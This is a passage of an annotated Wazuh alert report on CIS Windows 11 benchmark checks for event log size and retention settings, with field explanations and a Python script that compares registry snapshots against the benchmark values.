data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Security']
Registry key the check reads; the Group Policy setting in the remediation writes here. Confirm on the host with reg query or Get-ItemProperty if you need the current value.

data.sca.check.result:  passed
passed, failed or not applicable. This one passed: the Security log is not configured to stop recording when full. A not‑applicable result elsewhere means the check could not be evaluated and must not be read as a pass.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions
No remediation needed: check 26305 passed, so the Security log is not configured to stop recording when full. Keep it paired with the maximum log size check for the same EventLog\Security key (check 26306, next in this scan); overwrite‑when‑full only preserves evidence if the log is large enough to hold events until they are forwarded to the manager.
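Every check in this scan reduces to the same operation: read one value under HKLM\SOFTWARE\Policies\Microsoft\Windows and compare it with the benchmark's expected value, with a missing key reported as not applicable (as the Download Mode result above shows) rather than as a fail. The following Python is an added example, not Wazuh's SCA engine or CIS tooling. It re‑implements the six comparisons from this scan (the five checks above plus the Security log maximum‑size check for the same EventLog\Security key) against a constructed registry snapshot, first in the weak state this host reports and then in the hardened state the remediations produce. The value names (EnableOneSettingsAuditing, LimitDiagnosticLogCollection, AllowBuildPreview, DODownloadMode, Retention, MaxSize) are taken from the benchmark's registry audit procedure and do not appear in the alerts above; confirm them against your benchmark revision before relying on this. The undersized MaxSize in the weak snapshot is an assumption, since that check's result is not shown in this report.

```python
"""Re-implementation of six CIS Windows 11 registry checks against a constructed
registry snapshot. Added example; not the Wazuh SCA engine."""

POLICY_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows"

# (cis id, registry key, value name, predicate, expectation shown in the finding).
# Value names are assumed from the benchmark's audit procedure, not from the alerts.
CHECKS = [
    ("18.9.17.5", POLICY_ROOT + r"\DataCollection", "EnableOneSettingsAuditing",
     lambda v: v == 1, "== 1 (Enabled)"),
    ("18.9.17.6", POLICY_ROOT + r"\DataCollection", "LimitDiagnosticLogCollection",
     lambda v: v == 1, "== 1 (Enabled)"),
    ("18.9.17.8", POLICY_ROOT + r"\PreviewBuilds", "AllowBuildPreview",
     lambda v: v == 0, "== 0 (Disabled)"),
    ("18.9.18.1", POLICY_ROOT + r"\DeliveryOptimization", "DODownloadMode",
     lambda v: v != 3, "!= 3 (anything but Enabled: Internet)"),
    ("18.9.27.2.1", POLICY_ROOT + r"\EventLog\Security", "Retention",
     lambda v: v == "0", "== '0' (policy Disabled, overwrite as needed)"),
    ("18.9.27.2.2", POLICY_ROOT + r"\EventLog\Security", "MaxSize",
     lambda v: v >= 196608, ">= 196608 KB"),
]


def evaluate(snapshot):
    """snapshot: {registry key: {value name: data}}.
    Returns {cis id: (result, detail)} with result in passed / failed / not applicable."""
    results = {}
    for cis, key, name, ok, expected in CHECKS:
        values = snapshot.get(key)
        if values is None:
            # The key cannot be read at all. SCA reports this as not applicable,
            # which is an unverified state, not a pass: the OS default applies.
            results[cis] = ("not applicable", f"unable to read registry '{key}'")
        elif name not in values:
            results[cis] = ("failed", f"{name} not set, expected {expected}")
        elif ok(values[name]):
            results[cis] = ("passed", f"{name}={values[name]!r}")
        else:
            results[cis] = ("failed", f"{name}={values[name]!r}, expected {expected}")
    return results


def summarize(results):
    """Per-result counts, the shape an SCA scan summary carries."""
    counts = {"passed": 0, "failed": 0, "not applicable": 0}
    for result, _ in results.values():
        counts[result] += 1
    return counts


# Constructed snapshot matching what this host reports: the DataCollection and
# PreviewBuilds policy keys exist but carry none of the audited values, the
# DeliveryOptimization key is absent, and only the Security log retention value
# is compliant. The 20480 KB MaxSize is an assumed undersized figure.
WEAK_SNAPSHOT = {
    POLICY_ROOT + r"\DataCollection": {},
    POLICY_ROOT + r"\PreviewBuilds": {},
    POLICY_ROOT + r"\EventLog\Security": {"Retention": "0", "MaxSize": 20480},
}

# The same host after the remediation steps in this report are applied; mode 99
# (HTTP only, no peering, no cloud contact) is one of the values the description
# lists as acceptable.
HARDENED_SNAPSHOT = {
    POLICY_ROOT + r"\DataCollection": {"EnableOneSettingsAuditing": 1,
                                       "LimitDiagnosticLogCollection": 1},
    POLICY_ROOT + r"\PreviewBuilds": {"AllowBuildPreview": 0},
    POLICY_ROOT + r"\DeliveryOptimization": {"DODownloadMode": 99},
    POLICY_ROOT + r"\EventLog\Security": {"Retention": "0", "MaxSize": 196608},
}


if __name__ == "__main__":
    for label, snapshot in (("weak", WEAK_SNAPSHOT), ("hardened", HARDENED_SNAPSHOT)):
        results = evaluate(snapshot)
        print(f"{label}: {summarize(results)}")
        for cis, (result, detail) in results.items():
            print(f"  {result:<14} CIS {cis}: {detail}")
```

The distinction the code keeps, and that the report's "PASS or FAIL" wording blurs, is between a key that exists with a wrong or missing value (failed, remediate) and a key that does not exist (not applicable, verify the effective default on the host before deciding anything).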

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.895+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.895+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired. For SCA the stock rules encode the outcome: 19007 = check failed, 19008 = check passed, 19009 = not applicable. It should agree with data.sca.check.result below.

rule.firedtimes:  23
How many times this exact rule hit since the manager started counting. For SCA this is just the number of checks with the same outcome in the scan (here, 23 failed checks so far), not repeated behaviour by the host.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.2.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
CIS Critical Security Controls safeguard the benchmark maps this check to (8.3 = Ensure Adequate Audit Log Storage).

rule.gpg13:  ['4.12']
UK Good Practice Guide 13 (Protective Monitoring) control. Wazuh emits this key as gpg13 on some rules and gpg_13 on others, so a dashboard filter has to match both spellings.

rule.gdpr_IV:  ['35.7.d']
GDPR Chapter IV mapping, Article 35(7)(d); the same reference rule.gdpr above carries as IV_35.7.d.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2567241
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: check = the result of one policy check (this record); summary = the per‑scan passed/failed/not‑applicable totals. It does not say how the check was evaluated; that is implied by the registry, command or file fields below.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26306
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 196,608 or greater.
Detailed what/why of the check – great learning resource. One slip in the benchmark text: 4,194,240 kilobytes is about 4 GB, not 4 terabytes; the recommended floor of 196,608 KB (192 MB) is unaffected.

data.sca.check.rationale:  If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: 196,608 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Security\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.2.2
Exact CIS benchmark recommendation number for this one check. The per‑check compliance.* fields are narrower than the rule.* lists above: rule 19007 fires for every failed check, so its mappings are the union across all of them.

data.sca.check.compliance.cis_csc:  8.3
CIS Critical Security Controls mapping (v8 numbering – 8.3 = ensure adequate audit log storage).

data.sca.check.compliance.pci_dss:  10.6.1
PCI DSS requirement this check supports (10.6.1 = daily review of security events and logs).

data.sca.check.compliance.nist_800_53:  AU.6
NIST SP 800‑53 control (AU‑6 = audit record review, analysis and reporting).

data.sca.check.compliance.gpg13:  4.12
UK NCSC Good Practice Guide 13 (protective monitoring) control reference.

data.sca.check.compliance.gdpr_IV:  35.7.d
GDPR Chapter IV reference – Art. 35(7)(d), security measures a DPIA must document. Same mapping as rule.gdpr.

data.sca.check.compliance.hipaa:  164.312.b
HIPAA Security Rule § 164.312(b) – audit controls.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
SOC 2 Trust Services Criteria for this single check (the rule‑level tsc list merges several checks, which is why it repeats CC7.2).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Security']
Registry key the check read. The 'Security: Specify the maximum log file size' policy from the remediation text stores its value under this key, so this is where to confirm the fix landed (after a policy refresh on domain‑joined hosts).

data.sca.check.result:  failed
passed or failed against the benchmark. failed = configuration drift that needs a hardening ticket; it is a compliance finding, not evidence of intrusion.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.927+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.927+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.3.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
CIS Critical Security Controls mapping (v8 numbering – 8.3 = ensure adequate audit log storage).

rule.gpg13:  ['4.12']
UK NCSC Good Practice Guide 13 (protective monitoring) control reference.

rule.gdpr_IV:  ['35.7.d']
GDPR Chapter IV reference – Art. 35(7)(d), the security measures a DPIA must document. Same article as rule.gdpr, just split by chapter.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2571429
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type: 'check' = the result of one benchmark check (this alert); 'summary' = the end‑of‑scan pass/fail totals. It is not the scan engine.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26308
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 32,768 or greater.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: 32,768 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Setup\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.3.2
Exact CIS benchmark recommendation number for this one check. The per‑check compliance.* fields are narrower than the rule.* lists above, which are the union across every check the rule fires for.

data.sca.check.compliance.cis_csc:  8.3
CIS Critical Security Controls mapping (v8 numbering – 8.3 = ensure adequate audit log storage).

data.sca.check.compliance.pci_dss:  10.6.1
PCI DSS requirement this check supports (10.6.1 = daily review of security events and logs).

data.sca.check.compliance.nist_800_53:  AU.6
NIST SP 800‑53 control (AU‑6 = audit record review, analysis and reporting).

data.sca.check.compliance.gpg13:  4.12
UK NCSC Good Practice Guide 13 (protective monitoring) control reference.

data.sca.check.compliance.gdpr_IV:  35.7.d
GDPR Chapter IV reference – Art. 35(7)(d), security measures a DPIA must document. Same mapping as rule.gdpr.

data.sca.check.compliance.hipaa:  164.312.b
HIPAA Security Rule § 164.312(b) – audit controls.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
SOC 2 Trust Services Criteria for this single check (the rule‑level tsc list merges several checks, which is why it repeats CC7.2).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Setup']
Registry key the check read. The 'Setup: Specify the maximum log file size' policy from the remediation text stores its value under this key, so this is where to confirm the fix landed (after a policy refresh on domain‑joined hosts).

data.sca.check.result:  failed
passed or failed against the benchmark. failed = configuration drift that needs a hardening ticket; it is a compliance finding, not evidence of intrusion.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.943+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.943+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.4.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
CIS Critical Security Controls mapping (v8 numbering – 8.3 = ensure adequate audit log storage).

rule.gpg13:  ['4.12']
UK NCSC Good Practice Guide 13 (protective monitoring) control reference.

rule.gdpr_IV:  ['35.7.d']
GDPR Chapter IV reference – Art. 35(7)(d), the security measures a DPIA must document. Same article as rule.gdpr, just split by chapter.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2575577
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type: 'check' = the result of one benchmark check (this alert); 'summary' = the end‑of‑scan pass/fail totals. It is not the scan engine.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26309
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls Event Log behavior when the log file reaches its maximum size. The recommended state for this setting is: Disabled. Note: Old events may or may not be retained according to the Backup log automatically when full policy setting.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If new events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\System\Control Event Log behavior when the log file reaches its maximum size. Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Retain old events, but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.4.1
Exact CIS benchmark recommendation number for this one check. The per‑check compliance.* fields are narrower than the rule.* lists above, which are the union across every check the rule fires for.

data.sca.check.compliance.cis_csc:  8.3
CIS Critical Security Controls mapping (v8 numbering – 8.3 = ensure adequate audit log storage).

data.sca.check.compliance.pci_dss:  10.6.1
PCI DSS requirement this check supports (10.6.1 = daily review of security events and logs).

data.sca.check.compliance.nist_800_53:  AU.6
NIST SP 800‑53 control (AU‑6 = audit record review, analysis and reporting).

data.sca.check.compliance.gpg13:  4.12
UK NCSC Good Practice Guide 13 (protective monitoring) control reference.

data.sca.check.compliance.gdpr_IV:  35.7.d
GDPR Chapter IV reference – Art. 35(7)(d), security measures a DPIA must document. Same mapping as rule.gdpr.

data.sca.check.compliance.hipaa:  164.312.b
HIPAA Security Rule § 164.312(b) – audit controls.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
SOC 2 Trust Services Criteria for this single check (the rule‑level tsc list merges several checks, which is why it repeats CC7.2).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\System']
Registry key the check read. The 'Control Event Log behavior when the log file reaches its maximum size' policy stores its value under this key; Disabled means the System log overwrites the oldest events rather than stopping when full.

data.sca.check.result:  passed
passed or failed against the benchmark. failed = configuration drift that needs a hardening ticket; it is a compliance finding, not evidence of intrusion.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.959+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.959+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.4.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
CIS Critical Security Controls mapping (v8 numbering – 8.3 = ensure adequate audit log storage).

rule.gpg13:  ['4.12']
UK NCSC Good Practice Guide 13 (protective monitoring) control reference.

rule.gdpr_IV:  ['35.7.d']
GDPR Chapter IV reference – Art. 35(7)(d), the security measures a DPIA must document. Same article as rule.gdpr, just split by chapter.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2579721
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type: 'check' = the result of one benchmark check (this alert); 'summary' = the end‑of‑scan pass/fail totals. It is not the scan engine.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26310
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 32,768 or greater.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: 32,768 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\System\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.4.2
Exact CIS benchmark recommendation number for this one check. The per‑check compliance.* fields are narrower than the rule.* lists above, which are the union across every check the rule fires for.

data.sca.check.compliance.cis_csc:  8.3
CIS Critical Security Controls mapping (v8 numbering – 8.3 = ensure adequate audit log storage).

data.sca.check.compliance.pci_dss:  10.6.1
PCI DSS requirement this check supports (10.6.1 = daily review of security events and logs).

data.sca.check.compliance.nist_800_53:  AU.6
NIST SP 800‑53 control (AU‑6 = audit record review, analysis and reporting).

data.sca.check.compliance.gpg13:  4.12
UK NCSC Good Practice Guide 13 (protective monitoring) control reference.

data.sca.check.compliance.gdpr_IV:  35.7.d
GDPR Chapter IV reference – Art. 35(7)(d), security measures a DPIA must document. Same mapping as rule.gdpr.

data.sca.check.compliance.hipaa:  164.312.b
HIPAA Security Rule § 164.312(b) – audit controls.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
SOC 2 Trust Services Criteria for this single check (the rule‑level tsc list merges several checks, which is why it repeats CC7.2).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\System']
Registry key the check read. The 'System: Specify the maximum log file size' policy from the remediation text stores its value under this key, so this is where to confirm the fix landed (after a policy refresh on domain‑joined hosts).

data.sca.check.result:  failed
passed or failed against the benchmark. failed = configuration drift that needs a hardening ticket; it is a compliance finding, not evidence of intrusion.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

